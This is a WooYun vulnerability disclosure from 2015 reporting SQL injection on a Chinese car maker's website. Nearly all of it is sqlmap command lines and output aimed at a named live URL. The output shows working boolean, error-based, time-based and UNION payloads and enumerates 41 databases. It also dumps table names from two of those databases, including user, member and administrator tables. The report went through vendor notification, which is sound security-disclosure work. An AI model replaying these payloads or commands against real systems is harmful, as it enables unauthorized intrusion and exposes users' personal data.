当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155756

漏洞标题:郑州日产汽车有限公司WWW主站存在sql注入

相关厂商:郑州日产汽车有限公司

漏洞作者: SunnyDoll

提交时间:2015-11-25 12:37

修复时间:2016-01-11 16:00

公开时间:2016-01-11 16:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

什么叫低危险级别.

详细说明:

<code>root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:40:52
[22:40:52] [INFO] testing connection to the target URL
[22:40:55] [INFO] testing if the target URL is stable
[22:41:01] [INFO] target URL is stable
[22:41:01] [INFO] testing if GET parameter 'id' is dynamic
[22:41:06] [WARNING] GET parameter 'id' does not appear dynamic
[22:41:08] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:41:08] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[22:41:08] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[22:41:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:41:12] [WARNING] reflective value(s) found and filtering out
[22:41:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:41:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:42:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:42:58] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:44:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:45:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:46:26] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:46:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:47:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:48:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:49:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:10] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:50:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:50:43] [INFO] GET parameter 'id' seems to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[22:50:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:50:44] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[22:50:44] [INFO] testing 'MySQL inline queries'
[22:50:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:50:45] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:50:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:50:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:50:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:02] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[22:51:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:51:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:51:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:51:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:51:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:51:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[22:51:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:51:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[22:51:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:28] [CRITICAL] unable to connect to the target URL or proxy
[22:52:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:52:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:11] [CRITICAL] unable to connect to the target URL or proxy
[22:53:11] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 OR time-based blind' injectable
[22:53:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:53:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:53:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:53:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:53:42] [INFO] target URL appears to have 4 columns in query
[22:54:01] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:54:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:54:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:54:21] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:54:21
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:54:29
[22:54:29] [INFO] resuming back-end DBMS 'mysql'
[22:54:29] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:54:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:54:31] [INFO] fetching database names
[22:54:32] [INFO] the SQL query used returns 41 entries
[22:54:33] [INFO] retrieved: information_schema
[22:54:34] [INFO] retrieved: club_15
[22:54:35] [INFO] retrieved: ebuy
[22:54:36] [INFO] retrieved: ebuy1217
[22:54:42] [INFO] retrieved: events
[22:54:47] [INFO] retrieved: events_2014cgr
[22:54:48] [INFO] retrieved: events_2014five
[22:54:49] [INFO] retrieved: events_pickupStory
[22:54:50] [INFO] retrieved: ezznissan
[22:54:51] [INFO] retrieved: innodb
[22:54:52] [INFO] retrieved: jinzhiwen
[22:54:53] [INFO] retrieved: maintain
[22:54:53] [INFO] retrieved: mysql
[22:54:54] [INFO] retrieved: nissan
[22:55:00] [INFO] retrieved: nissan_2015cgr
[22:55:01] [INFO] retrieved: nissan_jxs
[22:55:07] [INFO] retrieved: nissan_patrol
[22:55:08] [INFO] retrieved: nissanmedia
[22:55:08] [INFO] retrieved: nissantest
[22:55:09] [INFO] retrieved: paladin
[22:55:10] [INFO] retrieved: paladinclub
[22:55:10] [INFO] retrieved: paladinclubtemp
[22:55:11] [INFO] retrieved: palaqi
[22:55:12] [INFO] retrieved: performance_schema
[22:55:13] [INFO] retrieved: specialcar
[22:55:14] [INFO] retrieved: test
[22:55:19] [INFO] retrieved: topic
[22:55:20] [INFO] retrieved: tower_15
[22:55:21] [INFO] retrieved: wqw_five
[22:55:22] [INFO] retrieved: wqw_mx6gc
[22:55:28] [INFO] retrieved: wqw_succk
[22:55:29] [INFO] retrieved: xuhui
[22:55:30] [INFO] retrieved: yaguan
[22:55:30] [INFO] retrieved: zznissan
[22:55:32] [INFO] retrieved: zznissan_eng
[22:55:33] [INFO] retrieved: zznissan_jnds
[22:55:33] [INFO] retrieved: zznissan_lms2015
[22:55:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:55:45] [INFO] retrieved: zznissan_mx6sj2015
[22:55:46] [INFO] retrieved: zznissan_mx6tg2015
[22:55:46] [INFO] retrieved: zznissan_pro
[22:55:47] [INFO] retrieved: zznissanbak
available databases [41]:
[*] club_15
[*] ebuy
[*] ebuy1217
[*] events
[*] events_2014cgr
[*] events_2014five
[*] events_pickupStory
[*] ezznissan
[*] information_schema
[*] innodb
[*] jinzhiwen
[*] maintain
[*] mysql
[*] nissan
[*] nissan_2015cgr
[*] nissan_jxs
[*] nissan_patrol
[*] nissanmedia
[*] nissantest
[*] paladin
[*] paladinclub
[*] paladinclubtemp
[*] palaqi
[*] performance_schema
[*] specialcar
[*] test
[*] topic
[*] tower_15
[*] wqw_five
[*] wqw_mx6gc
[*] wqw_succk
[*] xuhui
[*] yaguan
[*] zznissan
[*] zznissan_eng
[*] zznissan_jnds
[*] zznissan_lms2015
[*] zznissan_mx6sj2015
[*] zznissan_mx6tg2015
[*] zznissan_pro
[*] zznissanbak
[22:55:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:55:47
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:07
[22:56:07] [INFO] resuming back-end DBMS 'mysql'
[22:56:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:56:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:56:09] [INFO] fetching current database
current database: 'zznissan'
[22:56:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 22:56:10
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --tables -D zznissan
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:56:32
[22:56:33] [INFO] resuming back-end DBMS 'mysql'
[22:56:33] [INFO] testing connection to the target URL
[22:56:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[22:56:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:56:50] [INFO] fetching tables for database: 'zznissan'
[22:56:51] [INFO] the SQL query used returns 78 entries
[22:56:52] [INFO] retrieved: Recruitment
[22:56:53] [INFO] retrieved: act_article
[22:56:54] [INFO] retrieved: act_category
[22:56:55] [INFO] retrieved: article
[22:56:56] [INFO] retrieved: article1029
[22:56:57] [INFO] retrieved: brandpicture
[22:56:58] [INFO] retrieved: car_adimg
[22:56:58] [INFO] retrieved: car_brand
[22:57:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:57:15] [INFO] retrieved: car_carimg
[22:57:16] [INFO] retrieved: car_config
[22:57:16] [INFO] retrieved: car_detail
[22:57:17] [INFO] retrieved: car_drive
[22:57:19] [INFO] retrieved: car_drivehouse
[22:57:19] [INFO] retrieved: car_getinfo
[22:57:25] [INFO] retrieved: car_leixing
[22:57:26] [INFO] retrieved: car_models
[22:57:27] [INFO] retrieved: car_modelsinfo
[22:57:28] [INFO] retrieved: car_norms
[22:57:28] [INFO] retrieved: car_parameter
[22:57:34] [INFO] retrieved: car_seat
[22:57:35] [INFO] retrieved: car_series
[22:57:36] [INFO] retrieved: car_seriesinfo
[22:57:37] [INFO] retrieved: car_spec
[22:57:38] [INFO] retrieved: car_speed
[22:57:38] [INFO] retrieved: car_standard
[22:57:39] [INFO] retrieved: car_structure
[22:57:50] [INFO] retrieved: car_user
[22:57:50] [INFO] retrieved: car_userfun
[22:57:51] [INFO] retrieved: car_usergroup
[22:57:57] [INFO] retrieved: car_view
[22:57:58] [INFO] retrieved: category
[22:58:08] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:14] [INFO] retrieved: department
[22:58:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:26] [INFO] retrieved: displacement
[22:58:27] [INFO] retrieved: downcategory
[22:58:27] [INFO] retrieved: download
[22:58:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[22:58:55] [INFO] retrieved: dqcategory
[22:58:55] [INFO] retrieved: ecatalog
[22:59:01] [INFO] retrieved: energy_config
[22:59:02] [INFO] retrieved: energy_detail
[22:59:03] [INFO] retrieved: energy_images
[22:59:04] [INFO] retrieved: energy_memory
[22:59:05] [INFO] retrieved: energy_notice
[22:59:11] [INFO] retrieved: energy_parameter
[22:59:12] [INFO] retrieved: energy_picture
[22:59:23] [INFO] retrieved: energy_series
[22:59:29] [INFO] retrieved: energy_seriesinfo
[22:59:29] [INFO] retrieved: energy_video
[22:59:35] [INFO] retrieved: energy_view
[22:59:37] [INFO] retrieved: feedback
[22:59:37] [INFO] retrieved: get_active
[22:59:39] [INFO] retrieved: imagefile
[22:59:41] [INFO] retrieved: imgcategory
[22:59:42] [INFO] retrieved: jxs_getinfo
[22:59:42] [INFO] retrieved: login_record
[22:59:43] [INFO] retrieved: memory
[22:59:49] [INFO] retrieved: mobilepicture
[22:59:50] [INFO] retrieved: mx6_dealer
[22:59:56] [INFO] retrieved: mx6_testdrive
[23:00:06] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:13] [INFO] retrieved: mx6_user
[23:00:13] [INFO] retrieved: picture
[23:00:14] [INFO] retrieved: price
[23:00:15] [INFO] retrieved: purecategory
[23:00:22] [INFO] retrieved: puregoods
[23:00:22] [INFO] retrieved: rencai
[23:00:23] [INFO] retrieved: service
[23:00:24] [INFO] retrieved: service_bak
[23:00:31] [INFO] retrieved: sessions
[23:00:32] [INFO] retrieved: survey
[23:00:38] [INFO] retrieved: telents
[23:00:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:00:49] [INFO] retrieved: topic
[23:00:50] [INFO] retrieved: user
[23:00:56] [INFO] retrieved: userfun
[23:00:57] [INFO] retrieved: usergroup
[23:00:58] [INFO] retrieved: view_Carprice
[23:00:59] [INFO] retrieved: view_models
[23:01:05] [INFO] retrieved: view_models_test
[23:01:06] [INFO] retrieved: view_parameter
[23:01:07] [INFO] retrieved: zhaopin
Database: zznissan
[78 tables]
+-------------------+
| Recruitment |
| user |
| act_article |
| act_category |
| article |
| article1029 |
| brandpicture |
| car_adimg |
| car_brand |
| car_carimg |
| car_config |
| car_detail |
| car_drive |
| car_drivehouse |
| car_getinfo |
| car_leixing |
| car_models |
| car_modelsinfo |
| car_norms |
| car_parameter |
| car_seat |
| car_series |
| car_seriesinfo |
| car_spec |
| car_speed |
| car_standard |
| car_structure |
| car_user |
| car_userfun |
| car_usergroup |
| car_view |
| category |
| department |
| displacement |
| downcategory |
| download |
| dqcategory |
| ecatalog |
| energy_config |
| energy_detail |
| energy_images |
| energy_memory |
| energy_notice |
| energy_parameter |
| energy_picture |
| energy_series |
| energy_seriesinfo |
| energy_video |
| energy_view |
| feedback |
| get_active |
| imagefile |
| imgcategory |
| jxs_getinfo |
| login_record |
| memory |
| mobilepicture |
| mx6_dealer |
| mx6_testdrive |
| mx6_user |
| picture |
| price |
| purecategory |
| puregoods |
| rencai |
| service |
| service_bak |
| sessions |
| survey |
| telents |
| topic |
| userfun |
| usergroup |
| view_Carprice |
| view_models |
| view_models_test |
| view_parameter |
| zhaopin |
+-------------------+
[23:01:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:01:07
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --tables -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:09:41
[23:09:42] [INFO] resuming back-end DBMS 'mysql'
[23:09:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:09:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:09:42] [INFO] fetching tables for database: 'paladinclub'
[23:09:43] [INFO] the SQL query used returns 359 entries
[23:09:43] [INFO] retrieved: a_customers
[23:09:44] [INFO] retrieved: a_floor
[23:09:44] [INFO] retrieved: a_user
[23:09:45] [INFO] retrieved: article
[23:09:45] [INFO] retrieved: carinfo
[23:09:45] [INFO] retrieved: category
[23:09:46] [INFO] retrieved: cj_jl
[23:09:46] [INFO] retrieved: clubblock
[23:09:47] [INFO] retrieved: clubinfo
[23:09:47] [INFO] retrieved: czhd_memberinfo
[23:09:48] [INFO] retrieved: dakar
[23:09:48] [INFO] retrieved: dakar2006
[23:09:48] [INFO] retrieved: dakar20061
[23:09:49] [INFO] retrieved: dakar20062
[23:09:49] [INFO] retrieved: dakar20063
[23:09:50] [INFO] retrieved: dakar_config
[23:09:50] [INFO] retrieved: east2008_answer
[23:09:50] [INFO] retrieved: east2008_loginrecord
[23:09:51] [INFO] retrieved: east2008_question
[23:09:51] [INFO] retrieved: east2008_user
[23:09:52] [INFO] retrieved: east2008pho_loginrecord
[23:09:52] [INFO] retrieved: east2008pho_photo
[23:09:53] [INFO] retrieved: east2008pho_toupiao
[23:09:53] [INFO] retrieved: east2008pho_user
[23:09:54] [INFO] retrieved: eastgames_notify
[23:09:54] [INFO] retrieved: fankui
[23:09:54] [INFO] retrieved: file_flow
[23:09:55] [INFO] retrieved: file_flow_060817_bak
[23:09:55] [INFO] retrieved: file_info
[23:09:56] [INFO] retrieved: file_info_060817_bak
[23:09:56] [INFO] retrieved: file_save
[23:09:56] [INFO] retrieved: file_share
[23:09:57] [INFO] retrieved: file_share_060817_bak
[23:10:02] [INFO] retrieved: hk_article
[23:10:03] [INFO] retrieved: hk_class
[23:10:03] [INFO] retrieved: huikan
[23:10:03] [INFO] retrieved: imagefile
[23:10:04] [INFO] retrieved: imgcategory
[23:10:04] [INFO] retrieved: khly_hz
[23:10:05] [INFO] retrieved: language
[23:10:05] [INFO] retrieved: linesname
[23:10:06] [INFO] retrieved: lmsj
[23:10:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:10:17] [INFO] retrieved: media
[23:10:17] [INFO] retrieved: memberawoke
[23:10:18] [INFO] retrieved: memberinfo
[23:10:18] [INFO] retrieved: memberinfo1
[23:10:18] [INFO] retrieved: memberinfo_bak
[23:10:19] [INFO] retrieved: memberinfo_t
[23:10:19] [INFO] retrieved: membermark
[23:10:19] [INFO] retrieved: membermodify
[23:10:20] [INFO] retrieved: memberpay
[23:10:20] [INFO] retrieved: oneq_mission
[23:10:20] [INFO] retrieved: oneq_missiondata
[23:10:21] [INFO] retrieved: online
[23:10:26] [INFO] retrieved: paladin_awards
[23:10:27] [INFO] retrieved: prov
[23:10:27] [INFO] retrieved: pw_actattachs
[23:10:27] [INFO] retrieved: pw_actions
[23:10:28] [INFO] retrieved: pw_active
[23:10:28] [INFO] retrieved: pw_activity
[23:10:34] [INFO] retrieved: pw_activitycate
[23:10:34] [INFO] retrieved: pw_activitydefaultvalue
[23:10:34] [INFO] retrieved: pw_activityfield
[23:10:35] [INFO] retrieved: pw_activitymembers
[23:10:36] [INFO] retrieved: pw_activitymodel
[23:10:37] [INFO] retrieved: pw_activitypaylog
[23:10:37] [INFO] retrieved: pw_activityvalue1
[23:10:37] [INFO] retrieved: pw_activityvalue10
[23:10:43] [INFO] retrieved: pw_activityvalue11
[23:10:43] [INFO] retrieved: pw_activityvalue12
[23:10:44] [INFO] retrieved: pw_activityvalue13
[23:10:49] [INFO] retrieved: pw_activityvalue14
[23:10:50] [INFO] retrieved: pw_activityvalue15
[23:10:55] [INFO] retrieved: pw_activityvalue16
[23:10:56] [INFO] retrieved: pw_activityvalue17
[23:10:56] [INFO] retrieved: pw_activityvalue18
[23:10:57] [INFO] retrieved: pw_activityvalue2
[23:10:57] [INFO] retrieved: pw_activityvalue3
[23:10:57] [INFO] retrieved: pw_activityvalue4
[23:10:58] [INFO] retrieved: pw_activityvalue5
[23:10:58] [INFO] retrieved: pw_activityvalue6
[23:10:58] [INFO] retrieved: pw_activityvalue7
[23:11:04] [INFO] retrieved: pw_activityvalue8
[23:11:04] [INFO] retrieved: pw_activityvalue9
[23:11:05] [INFO] retrieved: pw_actmember
[23:11:05] [INFO] retrieved: pw_actmembers
[23:11:05] [INFO] retrieved: pw_administrators
[23:11:11] [INFO] retrieved: pw_adminlog
[23:11:11] [INFO] retrieved: pw_adminset
[23:11:12] [INFO] retrieved: pw_advert
[23:11:17] [INFO] retrieved: pw_announce
[23:11:19] [INFO] retrieved: pw_area_level
[23:11:24] [INFO] retrieved: pw_areas
[23:11:24] [INFO] retrieved: pw_argument
[23:11:25] [INFO] retrieved: pw_attachbuy
[23:11:25] [INFO] retrieved: pw_attachdownload
[23:11:26] [INFO] retrieved: pw_attachs
[23:11:26] [INFO] retrieved: pw_attention
[23:11:26] [INFO] retrieved: pw_attention_blacklist
[23:11:27] [INFO] retrieved: pw_auth_certificate
[23:11:32] [INFO] retrieved: pw_ban
[23:11:33] [INFO] retrieved: pw_banuser
[23:11:33] [INFO] retrieved: pw_bbsinfo
[23:11:34] [INFO] retrieved: pw_block
[23:11:34] [INFO] retrieved: pw_buyadvert
[23:11:34] [INFO] retrieved: pw_cache
[23:11:35] [INFO] retrieved: pw_cache_distribute
[23:11:35] [INFO] retrieved: pw_cache_members
[23:11:36] [INFO] retrieved: pw_cachedata
[23:11:36] [INFO] retrieved: pw_channel
[23:11:42] [INFO] retrieved: pw_clientorder
[23:11:42] [INFO] retrieved: pw_cmembers
[23:11:43] [INFO] retrieved: pw_cms_article
[23:11:43] [INFO] retrieved: pw_cms_articlecontent
[23:11:43] [INFO] retrieved: pw_cms_articleextend
